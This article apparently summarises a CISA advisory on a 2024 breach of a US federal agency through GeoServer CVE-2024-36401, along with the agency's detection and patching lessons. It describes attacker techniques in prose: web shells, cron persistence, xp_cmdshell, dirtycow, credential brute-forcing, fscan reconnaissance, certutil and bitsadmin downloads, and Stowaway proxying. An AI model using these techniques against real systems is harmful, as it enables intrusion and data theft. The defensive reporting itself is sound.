CISA Outlines Lessons Learned from the 2024 FCEB intrusion

A Cybersecurity and Infrastructure Security Agency (CISA) advisory details a 2024 intrusion at a U.S. federal civilian executive branch (FCEB) agency stemming from the exploitation of GeoServer vulnerability CVE-2024-36401, a critical remote code execution flaw. CISA states, “CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401.” It adds that the activity persisted undetected for weeks: “The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.” The agency’s lessons learned point to delayed remediation of a public-facing critical vulnerability, a lag in activating and enabling third-party support under the incident response plan, and protection gaps, most notably that a public web server “lacked endpoint protection.” The bug was patched in June 2024, public proof-of-concept exploits emerged in July, and opportunistic scanning and exploitation were observed on internet-exposed GeoServer instances around July 9. Together, these factors show how quickly unpatched services were targeted.

From July 11 to July 31, 2024, the threat actors expanded from “GeoServer 1” to “GeoServer 2,” then to a “Web Server,” and finally to a “SQL Server.” Initial access followed reconnaissance and targeted exploitation of CVE-2024-36401; artifacts show the use of Burp Suite’s Burp Scanner to profile the public GeoServer prior to exploitation. The operators attempted to upload “.js” files as part of early post-exploitation activity; logs show those attempts returned “404” responses, suggesting the uploads failed. Persistence was established across systems via uploaded web shells, scheduled “cron” jobs, and the creation of new local user accounts; CISA notes the accounts were later deleted, likely to reduce forensic artifacts, and that web shells were present “on each server,” including China Chopper. On the database tier, the actors enabled “xp_cmdshell” to execute operating-system commands, while privilege escalation attempts on Linux leveraged the “dirtycow” tool to move beyond service-level access.

Credential access relied primarily on brute-force techniques and misuse of service accounts. CISA adds that “They also accessed service accounts by exploiting their associated services.” Discovery was extensive and blended native utilities with external scanners. On Linux hosts, operators issued “uname,” “env,” “ps,” “netstat,” and “who” commands and read sensitive files with “cat,” including “/etc/passwd,” resolver settings, distribution release data, and application configuration such as “web.xml.” On Windows systems, the actors ran “whoami,” “ipconfig,” “systeminfo,” “tasklist,” “net group,” and recursive directory listings of “C:,” “C:\Users,” and IIS paths to map services and content. Network reconnaissance featured the “fscan” tool for host discovery, service identification, and port scanning, along with targeted pings and scans to locate SSH, FTP, file shares, and web servers; operators also pulled shell scripts to “/tmp,” including “/tmp/mm.sh” (later renamed “aa.sh”) and “aaa.zip,” as staging elements.

Command-and-control and payload staging combined living-off-the-land downloads with custom proxying. The actors fetched files using “PowerShell,” “bitsadmin,” and “certutil,” and deployed the Stowaway multi-level proxy to route traffic from the internet through the web tier to internal resources. One observed execution invoked the agent from a Tomcat service account directory; a secondary channel was later established over TCP/50012. “/tmp/mm.sh” was executed just prior to an encoded Stowaway launch, though its contents were unrecoverable. Additional artifacts hosted on the adversary’s infrastructure included the “RingQ” defense-evasion utility (“RinqQ.exe,” “RingQ.rar”), the “IOX” proxy, “BusyBox,” “WinRAR,” and multiple web shells and scripts (“Handx.ashx,” “start_tomcat.jsp,” along with “.sh,” “.py,” and “.bat” files). Detection ultimately occurred on July 31 when the agency’s endpoint tool flagged “1.txt” on the SQL Server after the attackers transferred it with “bitsadmin,” prompting containment and a broader investigation that surfaced the earlier GeoServer intrusion.